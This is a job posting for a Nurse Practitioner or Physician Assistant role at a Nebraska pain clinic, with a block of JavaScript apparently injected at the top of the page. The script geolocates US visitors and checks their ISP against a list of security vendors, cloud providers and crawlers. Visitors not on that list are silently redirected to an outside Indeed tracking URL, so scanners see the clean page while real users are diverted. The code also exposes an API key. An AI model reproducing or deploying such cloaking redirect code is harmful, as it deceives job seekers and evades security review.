Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/9b7f70076bddbc03/e32aaf8a863ae11bb3daab06c3ec00f3326137d84d10e36e37e4289dd56ce7f4/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Seeking a full-time Nurse Practitioner or Physician Assistant for an independent pain management practice in Kearney, NE, starting February 2nd, 2026.
Responsibilities include providing medical diagnosis and treatment to adult patients with chronic pain in an ambulatory setting and assisting with interventional pain procedures.
Work autonomously and collaboratively with physicians and staff, with clinic hours Monday-Friday, 8 AM – 5 PM, no nights, weekends, holidays, or on-call. Occasional travel to outreach clinics may be required.
Requirements include NE licensure with no disciplinary actions, national certification, unrestricted DEA license (or ability to obtain), EMR experience (Athena preferred), and a strong desire to learn, especially for new graduates.
Compensation ranges from $110,000 to $130,000 annually, with benefits such as health, dental, vision insurance, PTO, 401(k) with matching, malpractice insurance, and continuing education credits.
Applicants must be licensed in Nebraska, work day shifts, and be willing to travel up to 25%.